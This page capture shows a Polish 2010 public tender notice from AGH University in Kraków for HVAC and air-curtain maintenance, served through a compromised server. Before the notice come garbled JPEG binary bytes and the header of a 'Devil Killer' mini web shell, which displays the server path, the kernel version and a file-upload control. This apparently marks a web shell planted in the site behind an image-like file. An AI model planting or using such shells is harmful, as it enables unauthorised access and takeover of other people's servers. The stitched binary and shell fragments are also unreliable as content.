JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100929/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100929/267649-N-2010.html

<p class="kh_header"><b>Kraków: Wykonanie konserwacji i bieżących napraw instalacji i urządzeń wentylacji mechanicznej oraz klimatyzacji oraz konserwacji kurtyn powietrznych na terenie Uczelni</b><br>
<b>Numer ogłoszenia: 267649 - 2010; data zamieszczenia: 29.09.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Akademia Górniczo - Hutnicza im. Stanisława Staszica , Al. Mickiewicza 30, 30-059 Kraków, woj. małopolskie, tel. 012 6173595, faks (012) 6173595, 6173363.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.dzp.agh.edu.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie konserwacji i bieżących napraw instalacji i urządzeń wentylacji mechanicznej oraz klimatyzacji oraz konserwacji kurtyn powietrznych na terenie Uczelni.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> I.	Prowadzenie konserwacji sieci kanałów wentylacyjnych w obiektach Uczelni - należy wykonać 3-krotnie w roku.

W ramach prowadzonych prac należy w szczególności wykonać:
1.	Oględziny ogólne i ocenę stanu technicznego sieci kanałów wentylacyjnych oraz usuwanie występujących nieprawidłowości. Dotyczy: 
a.	szczelności kanałów,
b.	szczelności połączeń elastycznych,
c.	stanu izolacji termicznej i akustycznej.
2.	Ocenę parametrów powietrza nawiewanego (w stosunku do założeń projektowych),     w tym:
a.	kontrolę parametrów pracy i przepływu powietrza przez kratki i anemostaty nawiewne i wyciągowe,
b.	czyszczenie i usuwanie zabrudzeń kratek i anemostatów nawiewnych                  i wyciągowych,
c.	kontrolę temperatury powietrza nawiewanego,
d.	sprawdzenie i regulację poprawności rozdziału powietrza:
e.	regulację  przepustnic na sieci,
f.	regulację przepustnic na kratkach i anemostatach.
3.	Sprawdzenie zewnętrznego stanu izolacji i poprawności oklejenia piktogramami, ewentualne poprawki.
4.	Wypełnienie dokumentów z przeprowadzonej konserwacji wskazanych przez Zamawiającego.
Powyższe czynności nie obejmują ewentualnych napraw oraz zakupu materiałów eksploatacyjnych.
Materiały konieczne do realizacji prac konserwacyjnych, rozliczane będą po kosztach zakupu wraz z kosztami zaopatrzenia.

II.	Prowadzenie konserwacji central wentylacyjnych i klimatyzacyjnych wraz z układami automatyki w obiektach Uczelni   -  3-krotnie w roku. 

W ramach prowadzonych prac w szczególności należy wykonać:
1.	Ocenę stanu zespołu wentylatorowego, w tym:
a.	kontrolę stanu zużycia łożysk, 
b.	sprawdzenie stanu i regulację naciągu pasów klinowych,
c.	ewentualną wymianę pasów klinowych,
d.	sprawdzenie i regulację przekładni pasowej,
e.	czyszczenie silnika i przekładni,
f.	pomiar wydajności, obrotów i wibracji wentylatorów.
g.	pomiary elektryczne silników podczas rozruchu i w czasie pracy (prądy, napięcia, moce, obroty) oraz porównanie z wartościami znamionowymi urządzeń.
2.	Sprawdzenie poprawności funkcjonowania przepustnic:
a.	kontrolę stanu zanieczyszczenia łopat przepustnic oraz  ich oczyszczenie,
b.	kontrolę stanu zużycia kół zębatych napędu łopat przepustnic oraz ewentualna ich wymiana.
3.	Ogólną ocenę stanu technicznego wymienników ciepła/chłodu:
a.	sprawdzenie poprawności działania i parametrów medium grzewczego/chłodniczego:
-	sprawdzenie ciśnienia i temperatur pracy, 
-	sprawdzenie szczelności,
b.	sprawdzenie i poprawienie stanu izolacji termicznych instalacji ciepła/chłodu
4.	Sprawdzenie poprawności działania nagrzewnic elektrycznych (w tym kanałowych):
a.	ogólną kontrolę stanu technicznego nagrzewnic elektrycznych,
b.	kontrolę stopnia zanieczyszczenia spirali grzewczych oraz ich oczyszczenie (raz na 4 miesiące, oraz każdorazowo po postoju central wentylacyjnych),
5.	Sprawdzenie poprawności działania nagrzewnic wodnych i glikolowych:
a.	kontrolę stopnia zabrudzenia lameli nagrzewnicy,
b.	sprawdzenie szczelności połączeń hydraulicznych,
c.	odpowietrzenie wymiennika,
d.	kontrolę poprawności działania zabezpieczenia przeciwzamrożeniowego, oraz poprawności jego nastaw,
e.	sprawdzenie czystości odkraplacza i tacy ociekowej,
f.	sprawdzenie drożności spływu skroplin i stanu technicznego syfonu,
g.	ścisłe przestrzeganie zaleceń eksploatacyjnych producenta dla danej centrali wentylacyjno - klimatyzacyjnej zawartych w DTR, w okresie zimowym oraz w przypadku planowanych postojów urządzeń.
6.	Sprawdzenie poprawności działania chłodnic wodnych/glikolowych/freonowych:
a.	kontrolę stopnia zabrudzenia lameli chłodnic,
b.	sprawdzenie szczelności,
c.	sprawdzenie udziału glikolu w mieszaninie oraz jego uzupełnienie;
d.	sprawdzenie drożności i zalania syfonu wodą,
e.	sprawdzenie czy w wannie na kondensat nie ma zanieczyszczeń,
f.	sprawdzenie stanu zabrudzenia odkraplacza,
g.	ścisłe przestrzeganie zaleceń eksploatacyjnych producenta dla danej centrali wentylacyjno - klimatyzacyjnej zawartych w DTR, w okresie zimowym oraz w przypadku planowanych postojów urządzeń.
7.	Sprawdzenie stanu technicznego wymienników krzyżowych:
a.	sprawdzenie stopnia zabrudzenia wymienników oraz ich oczyszczenie,
b.	sprawdzenie funkcjonowania przepustnicy oraz stanu odkraplacza i tacy ociekowej wraz z systemem odpływowym skroplin,
c.	kontrolę poprawności zamontowania systemu zapobiegającego szronieniu, oraz przeprowadzenie próby szczelności przepustnicy obejściowej.
8.	Sprawdzenie stanu technicznego wymienników rotacyjnych:
a.	kontrolę stopnia zabrudzenia wymienników oraz ewentualne ich oczyszczenie,
b.	kontrolę pracy wirnika,
c.	sprawdzenie i regulacja naciągu pasów klinowych, 
d.	ewentualną wymianę pasów klinowych,
e.	kontrolę stanu zużycia łożysk,
f.	sprawdzenie i regulację przekładni,
g.	okresowe czyszczenie silnika i przekładni z kurzu i zanieczyszczeń.
9.	Sprawdzenie stopnia zabrudzenia filtrów:
a.	kontrolę stopnia zanieczyszczenia filtrów,
b.	wymianę zanieczyszczonych filtrów, na filtry o identycznej klasie filtracji,
c.	usuwanie zanieczyszczeń z całej sekcji filtracji.
10.	Pomiar prądów pobieranych przez odbiorniki energii elektrycznej:
a.	silniki wentylatorów nawiewu /wywiewu, wymienników obrotowych,
b.	nagrzewnic elektrycznych,
c.	pomp obiegów ciepła/chłodu,
 
11.	Kontrolę pracy i przetestowanie układów AKPiA:
a.	sprawdzenie poprawności działania oraz nastaw zainstalowanych urządzeń AKPiA:
-	termicznego zabezpieczenia silników wentylatorów,
-	zwarciowego zabezpieczenia silników wentylatorów,
-	siłownika przepustnicy pow. świeżego /pow. wywiewanego,
-	siłownika przepustnicy recyrkulacyjnej,
-	siłownika przepustnicy obejściowej (wymiennik krzyżowy),
-	siłownika zaworu nagrzewnicy wodnej,
-	siłownika zaworu chłodnicy wodnej,
-	siłownika zaworu glikolu w układach odzysku ciepła,
-	pomp obiegów ciepła/chłodu,
-	kanałowych czujników temperatury pow. nawiewanego/wywiewanego,
-	termostatu przeciwzamrożeniowego nagrzewnicy wodnej po stronie powietrza,
-	termostatu przeciwzamrożeniowego na wodzie powrotnej, 
-	presostatów różnicowych wentylatora nawiewu/wywiewu
-	presostatów różnicowych filtru wstępnego/wtórnego - nawiew/wywiew,
-	czujników zabezpieczenia nawilżacza,
-	termostatu temperatury zewnętrznej,
-	czujników temperatury i wilgotności,
-	innych elementów AKPiA,
b.	kontrolę sygnałów od i do układów AKPiA oraz urządzeń współpracujących,
c.	sprawdzenie poprawności nastaw modułów sterujących (sterowniki programowalne, przekaźniki sterujące, przetworniki pomiarowe, inne),
d.	sprawdzenie poprawności działania nastawników pomieszczeniowych,
e.	sprawdzenie poprawności działania oraz nastaw falowników silników wentylatorów nawiewu/wywiewu,
f.	kontrolę i konserwację stanu okablowania central i szaf sterująco-zasilających,
g.	przeprowadzanie innych czynności konserwacyjnych przewidzianych w DTR producenta central w zakresie automatyki.
12.	Dodatkowe prace konserwacyjne przewidziane przez producenta central, ujęte w DTR.
13.	Sprawdzenie stanu zewnętrznego urządzenia i poprawności oklejenia piktogramami, ewentualne poprawki.
14.	Wypełnienie dokumentów z przeprowadzonej konserwacji wskazanych przez Zamawiającego (również w formie elektronicznej) i wymianę filtrów.
 
Koszt materiałów (filtrów) ponosi Wykonawca. Każdorazowo po wymianie filtrów należy dostarczyć protokół z ich wymiany. 

III.	Prowadzenie konserwacji instalacji i urządzeń chłodniczych  
w obiektach Uczelni  -   należy wykonać 3-krotnie w roku.

W ramach prowadzonych prac w szczególności należy wykonać:
 
1.	Ocenę stanu technicznego części mechanicznych urządzeń:
a.	kontrolę mocowania urządzeń i wszystkich części instalacji chłodniczych,
b.	zewnętrzne oględziny i czyszczenie urządzeń i instalacji,
c.	czyszczenie, komory sprężarek, lameli wymienników, parowników, schładzaczy, pomp, powierzchni wymienników ciepła, żaluzji układu ssącego i nawiewnego.
d.	Sprawdzenie i wymianę filtrów powietrza,
e.	kontrolę pasów klinowych, łożysk w wentylatorach,
f.	kontrolę wibracji i głośności urządzenia,
g.	sprawdzenie izolacji antywibracyjnych,
h.	sprawdzenie połączeń mechanicznych ( śruby, nity lub klamry )
2.	Sprawdzenie stanu technicznego części chłodniczej urządzeń:
a.	kontrolę szczelności obwodów,
b.	kontrolę zawilgocenia układu,
c.	pomiary ciśnień: strona ssawna/tłoczna, wejście/wyjście                                      z skraplacza/parowacza,
d.	pomiary temperatur: strona ssawna/tłoczna/cieczowa, wejście/wyjście                z skraplacza/parowacza,
e.	kontrolę przepływu wody przez skraplacz/parowacz,
f.	pomiary stałych obwodu freonowego/ glikolowego,
g.	kontrolę odpływu skroplin,
3.	Sprawdzenie części elektrycznej urządzeń:
a.	kontrolę mocowania przewodów,
b.	kontrolę nastaw i działania AKPiA - kalibrację czujników, 
c.	pomiary prądów w czasie startu oraz pracy: sprężarek, wentylatorów, schładzaczy, pomp, porównanie wyników pomiarów z wartościami znamionowymi urządzeń.
d.	kontrola przepływu powietrza i regulacja obrotów wentylatorów, 
4.	Dodatkowe prace konserwacyjne przewidziane przez producenta urządzeń, ujęte          w DTR,
5.	Sprawdzenie stanu zewnętrznego urządzenia i poprawności oklejenia piktogramami, ewentualne poprawki.
6.	Wypełnienie dokumentów z przeprowadzonej konserwacji wskazanych przez Zamawiającego (również w formie elektronicznej).
Powyższe czynności nie obejmują ewentualnych napraw oraz zakupu materiałów eksploatacyjnych.
Materiały konieczne do realizacji prac konserwacyjnych, rozliczane będą po kosztach zakupu wraz z kosztami zaopatrzenia.
 
IV.	Prowadzenie konserwacji wentylatorów wyciągowych  wraz z układami zasilania i sterowania należy wykonać 3-krotnie w roku.

W ramach prowadzonych prac w szczególności należy wykonać:
1.	Ocenę stanu zespołu wentylatorowego, w tym:
a.	kontrolę mocowania silnika oraz wentylatora,
b.	kontrolę stanu zużycia łożysk, przekładni, pasów klinowych,
c.	czyszczenie silnika, przekładni, smarowanie,
d.	kontrolę głośności urządzenia, pomiar wibracji, ewentualne wywarzanie zespołu wentylatorowego,
e.	pomiar prądów i kontrolę obrotów silnika,
f.	sprawdzenie siły ciągu,
g.	sprawdzenie i kontrolę układów zasilania, sterowania i sygnalizacji pracy wentylatorów,
2.	Dodatkowe prace konserwacyjne przewidziane przez producenta urządzeń, ujęte         w DTR,
3.	Wypełnienie dokumentów z przeprowadzonej konserwacji wskazanych przez Zamawiającego.
Powyższe czynności nie obejmują ewentualnych napraw oraz zakupu materiałów eksploatacyjnych.
Materiały konieczne do realizacji prac konserwacyjnych, rozliczane będą po kosztach zakupu wraz z kosztami zaopatrzenia.
 
V.	Prowadzenie konserwacji kurtyn powietrznych na terenie Uczelni, 3 razy w roku, zgodnie z DTR poszczególnych typów urządzeń.


a.	Sprawdzenie poprawności działania nagrzewnic elektrycznych,
b.	ogólną kontrolę stanu technicznego nagrzewnic elektrycznych,
c.	kontrolę stopnia zanieczyszczenia spirali grzewczych oraz ich oczyszczenie,
d.	kontrolę mocowania silnika oraz wentylatora,
e.	kontrolę stanu zużycia łożysk, przekładni,
f.	czyszczenie silnika, przekładni, smarowanie,
g.	kontrolę głośności urządzenia, pomiar wibracji, ewentualne wywarzanie zespołu wentylatorowego,
h.	sprawdzenie i kontrolę układów zasilania, sterowania i sygnalizacji pracy wentylatorów.


VI.	Wykonanie napraw bieżących urządzeń wentylacji mechanicznej oraz klimatyzacji na terenie Uczelni.

1.	Zamawiający może zlecić Wykonawcy wykonanie naprawy lub usługi, które Wykonawca musi przyjąć do realizacji.
2.	Koszty napraw rozliczane będą na podstawie oddzielnych zleceń, po przedstawieniu przez Wykonawcę i zatwierdzeniu przez Zamawiającego dokładnego, opartego na KNR kosztorysu.
3.	Łączna wartość zleceń za bieżące naprawy w okresie trwania umowy, nie może przekroczyć wartości 98 900,00 zł brutto .
4.	W przypadkach napraw bieżących stawka roboczogodziny, nie będzie wyższa niż podana w  formularzu oferty. 

VII.	Ponadto: 

1.	Wykonawca zobowiązany jest przybyć na miejsce awarii w ciągu 1 godziny we wszystkie dni tygodnia, łącznie z niedzielami i świętami oraz usunąć awarię w ciągu 4 godzin (w przypadku braku konieczności wymiany części i podzespołów) od otrzymania zgłoszenia telefonicznego lub faksowego do siedziby serwisu na podany numer.
2.	W przypadku zaistnienia awarii - Wykonawca zobowiązany jest do właściwego zabezpieczenia urządzenia przed:
a.	powstaniem dodatkowych uszkodzeń wynikających z charakteru awarii (zgodnie z zaleceniami producenta),
b.	możliwością spowodowania zagrożenia oraz przed dostępem osób niepowołanych.
3.	Wykonawca każdorazowo powiadomi Dział Techniczny oraz Kierownika Technicznego Obiektu(Pływalnia AGH), o podjętych działaniach w celu usunięcia przyczyn zaistniałych awarii.
4.	Każdorazowo po usunięciu awarii lub po planowym postoju urządzeń wentylacyjno-klimatyzacyjnych, Wykonawca dokona rozruchu i ruchu próbnego urządzeń, w obecności przedstawiciela Działu Technicznego lub osoby wyznaczonej,(Kierownika Technicznego na Pływalni  AGH), oraz potwierdzi fakt przeprowadzenia rozruchu i poprawności działania urządzeń klimatyzacyjnych odpowiednim protokołem.
5.	Zleceniobiorca dostarczy materiały i urządzenia niezbędne do usunięcia usterek i awarii, chyba że Zleceniodawca zdecyduje inaczej.
6.	Wykonawca zobowiązany jest do prowadzenia wymaganej przepisami, pełnej dokumentacji technicznej prowadzonych przeglądów i konserwacji.
7.	Wykonawca zobowiązany jest wnosić, do istniejącej dokumentacji technicznej urządzeń, wszelkie wprowadzane zmiany i modyfikacje.
8.	Wykonawca zobowiązany jest do przeprowadzenia inwentaryzacji wskazanych przez zamawiającego urządzeń wentylacji mechanicznej i klimatyzacji .
9.	Wykonawca zobowiązany jest do wykonania wymaganych przepisami okresowych pomiarów elektrycznych, dla wskazanych przez zamawiającego instalacji i urządzeń wentylacji mechanicznej i klimatyzacji.
10.	Wykonawca zobowiązany jest do ścisłego przestrzegania obowiązujących przepisów bhp i p/poż., w czasie prowadzenia prac konserwacyjnych.
11.	Wykonawca zobowiązany jest do stosowania się do wszystkich poleceń i instrukcji przedstawiciela Działu Technicznego (Kierownika Technicznego Obiektu-Pływania AGH), które są zgodne z obowiązującymi przepisami.
12.	Fakt przeprowadzenia czynności konserwacyjnych oraz naprawczych, musi być odnotowywany, każdorazowo przez Wykonawcę w odpowiednich dokumentach wskazanych przez Zamawiającego. Jednocześnie niniejsze dokumenty są podstawą rozliczenia się Wykonawcy z Zamawiającym ze zleconych prac.
13.	Wykonawca wyraża zgodę na 14 dniowy okres płatności od daty otrzymania faktury przez Zamawiającego.
14.	Osoby odpowiedzialne za wykonanie przedmiotu zamówienia muszą posiadać stosowne uprawnienia do obsługi urządzeń wentylacji i klimatyzacji(Oświadczenie złożone na formularzu oferty).

 
15.	Wykonawca udzieli gwarancji na wykonane roboty na okres 1 roku od wykonanej naprawy zaś na dostarczone urządzenia - na okres zgodny z gwarancją udzieloną przez producenta

Powyższe prace dotyczą wszystkich instalacji i urządzeń wentylacji mechanicznej, klimatyzacji oraz kurtyn powietrznych zainstalowanych na terenie Uczelni, które zostały wymienione w załączniku nr 8 do niniejszej SIWZ

Prace rozpoczęte w czasie obowiązywania umowy, należy zakończyć..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 50.71.00.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> w niniejszym postępowaniu wadium nie obowiązuje</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Działalność prowadzona na potrzeby wykonania przedmiotu zamówienia nie wymaga posiadania specjalnych uprawnień.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcy winni udokumentować posiadanie wiedzy i doświadczenia poprzez wykazanie, że w ciągu ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, zrealizował a w przypadku świadczeń okresowych lub ciągłych realizuje, co najmniej 3 zamówienia na łączną kwotę minimum:
500 000,00 PLN odpowiadające swoim rodzajem usługom stanowiącym przedmiot niniejszego postępowania, z podaniem ich wartości, dat wykonania oraz odbiorców z załączeniem dokumentów potwierdzających, że prace te zostały wykonane należycie lub są wykonywane należycie. 
Ocenę spełniania warunku udziału w postępowaniu zamawiający przeprowadzi na podstawie załączonego do oferty wykazu usług (zał. nr 4) + dokumenty potwierdzające należyte wykonanie, metodą spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. 
Ocenę spełniania warunku udziału w postępowaniu zamawiający przeprowadzi na podstawie załączonego do oferty oświadczenia, metodą spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca winien dysponować osobami posiadającymi: 
a)	aktualne uprawnienia energetyczne typu E dla urządzeń, instalacji i sieci energetycznych wymienionych w grupie I i II, wg załącznika nr 1, do Rozporządzenia Ministra Gospodarki, z dnia 16.01.2000r., w sprawie: wymagań kwalifikacyjnych dla osób zajmujących się eksploatacją urządzeń instalacji i sieci (Dz. U. Nr 15, poz. 187)  
b)	aktualne świadectwo kwalifikacji dla osób dokonujących naprawy i obsługi technicznej urządzeń i instalacji chłodniczych zawierających substancje kontrolowane zgodnie z  Ustawą z dnia 20 kwietnia 2004 r. o substancjach zubożających warstwę ozonową (Dz. U. nr 121 poz. 1263),
Ocenę spełniania warunku udziału w postępowaniu zamawiający przeprowadzi na podstawie załączonego do oferty wykazu osób  oraz oświadczenia, metodą spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. 
Ocenę spełniania warunku udziału w postępowaniu zamawiający przeprowadzi na podstawie załączonego do oferty oświadczenia, metodą spełnia/nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
